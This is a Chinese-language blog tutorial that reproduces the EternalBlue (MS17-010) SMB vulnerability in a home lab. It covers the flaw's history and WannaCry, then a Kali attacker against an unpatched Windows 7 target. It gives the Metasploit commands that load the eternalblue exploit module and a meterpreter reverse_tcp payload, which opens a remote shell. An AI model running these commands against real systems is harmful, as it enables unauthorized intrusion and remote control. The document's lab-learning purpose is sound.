(ms17-010)永恒之蓝漏洞的复现

一、什么是永恒之蓝
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
二、攻击方式
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
三、漏洞复现
1.环境准备
攻击机:kali IP:192.168.0.105
靶机:win7 IP:192.168.0.103
注意靶机要开放445端口,没有打永恒之蓝的补丁,同时关闭防火墙
查看靶机是否开放445端口
(ms17-010)永恒之蓝漏洞的复现_第1张图片
利用metasploit的已有模块进行攻击

use exploit/windows/smb/ms17_010_eternalblue

(ms17-010)永恒之蓝漏洞的复现_第2张图片
设置攻击的payload

set payload windows/x64/meterpreter/reverse_tcp

(ms17-010)永恒之蓝漏洞的复现_第3张图片

然后使用run或者exploit命令开始攻击
(ms17-010)永恒之蓝漏洞的复现_第4张图片
出现meterpreter复现漏洞成功
获取其他的信息:
(ms17-010)永恒之蓝漏洞的复现_第5张图片

你可能感兴趣的:(漏洞复现,安全漏洞,信息安全,linux)